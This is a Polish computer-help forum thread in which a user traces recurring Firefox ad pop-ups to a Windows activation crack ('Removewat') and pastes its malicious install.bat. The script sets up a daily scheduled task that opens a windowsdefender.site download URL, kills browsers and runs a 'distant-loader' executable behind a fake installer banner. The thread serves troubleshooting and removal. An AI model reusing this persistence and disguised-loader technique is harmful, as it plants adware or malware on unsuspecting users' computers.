jjey225 Opublikowano 2 Sierpnia 2017 Zgłoś Opublikowano 2 Sierpnia 2017 Hej, otóż od pewnego czasu zauważyłem, iż przeglądarka Firefox włącza mi pojedyncze okno z jakąś reklamą. Dzieje się tak nawet gdy przeglądarka jest wyłączona. Udało mi się ustalić po historii jaki adres jest samoczynnie wpisywany: http://windowsdefender.site/download/download.php?mn=9996 Myślałem na początku, że Windows Defender stał się wirusem albo coś ale nie sądzę gdyż ten jest wyłączony ponieważ posiadam Avast'a, a ten nic nie wykrył. Macie jakieś pomysły? Na razie to okno wyskakuje co kilka godzin i nie jest za bardzo upierdliwe ale boję się że niedługo może zacząć się dziać coś gorszego. Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
reyden Opublikowano 2 Sierpnia 2017 Zgłoś Opublikowano 2 Sierpnia 2017 Zastap Avasta porządnym antywirusem . Przeskanuj kompa za pomocą Malware Bytes Antimalware lub AdwCleaner , opcjonalnie Dr.Web CureIT , po skanie daj loga z wynikiem działania któregoś z tych programów , zresztą wszystko masz w zasadach dotyczących tego działu . Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
jjey225 Opublikowano 2 Sierpnia 2017 Zgłoś Opublikowano 2 Sierpnia 2017 Na razie ukończyłem w końcu skan Avast'a oto on: Ten pierwszy plik: "ICReninstall_windwos_reg_ac.exe" został usunięty, drugi tak samo jednak folder "Removewat 2.2.7" został, a w nim plik "install.bat". Znajduje się w nim taka zawartość: schtasks /create /tn "PPI Update" /tr "%SYSTEMROOT%\explorer.exe ""http://windowsdefender.site/download/download.php?mn=9996"""/sc DAILY @echo offecho Download and Install Removewat Final by Daz Team...echo Opeaning Setup..."Setup activation.exe"echo.@echo offtaskkill /f /IM chrome.exetaskkill /f /IM firefox.exetaskkill /f /IM iexplore.execlsecho Install Removewat 2.2.7 50%...echo.echo Applying Registry Patch...echo."Setup activation1.exe"echo Removewat 2.2.7 78%...echo.echo Installation Completed....echo."distant-loader.exe"echo.echo.echo New Removewat 2.2.7 found!echo.start windows_reg_ac.exeecho.echo Download and install new version....echo.@echo offschtasks /Run /TN "PPI Update"echo New Removewat 2.6.7 Found! ** UPDATE IN PROGRESS... **echo.echo.echo.echo.echo.echo Updating to New Version....pause Po tej pierwszej części, czyli: "schtasks /create /tn "PPI Update" /tr "%SYSTEMROOT%\explorer.exe ""http://windowsdefender.site/download/download.php?mn=9996"""/sc DAILY" wiem już o co chodzi. 5 minut w cmd'u czytania pomocy i proszę: Czystko, pusto, pięknie. Avast jak widać nie taki zły. Spanikowałem trochę i za szybko posta napisałem, sorry za zaśmiecanie forum. P.S.: Zastap Avasta porządnym antywirusem . W takim razie kolego reyden, jaki antywirus polecasz? Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Jabar83 Opublikowano 2 Sierpnia 2017 Zgłoś Opublikowano 2 Sierpnia 2017 Ja tam korzystam z Eseta od lat i nie od lat nie mam problemu z wirusami czy innym syfem. Wystarczy z głową korzystać z internetu i odpowiednio sprawdzać apki, które się instaluje. Czasem dorzucają różne świństwa. Samo włączająca się przeglądarka z reklamą może wskzywać, że jakiś program działający w tle uruchamia ją co jakiś czas. Może to być jakiś syf też, więc warto przeskanować dysk i system różnymi programami. Jest tego trochę. W innym wypadku usuń całkowicie Firefox'a. Ale wcześniej usuń wszystkie ciasteczka i całą historię, oraz wszelkie katalogi po firefox'ie. Zainstaluj Chrome i sprawdź jak tam będzie. 1 Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
jjey225 Opublikowano 2 Sierpnia 2017 Zgłoś Opublikowano 2 Sierpnia 2017 Od czasu kupna nowego komputera zacząłem każdą instalkę czy spakowaną paczkę skanować antywirusem przed jak i po odpakowaniu.Mój problem zaczął się w sumie od czasu gdy użyłem programu usuwającego WAT gdyż zaczęły mnie denerwować powiadomienia o tym że mogę być ofiarą fałszywego oprogramowania. Teraz dopiero zauważyłem iż 1 linijka z komendą w batchu jest w stanie narobić tyle problemów.Generalnie korzystam z 2 przeglądarek: Firefox'a i Chrome'a. Ognisty Lis jest moją główną przeglądarką. Z Chrome'em problemów nie było, teraz muszę poczekać i zobaczyć czy problem znikł na dobre.W sumie ESET też jest ciekawy i na pewno o obczaje.Dzięki Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Kolobos Opublikowano 3 Sierpnia 2017 Zgłoś Opublikowano 3 Sierpnia 2017 Zamiesc wymagane logi z FRST! Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...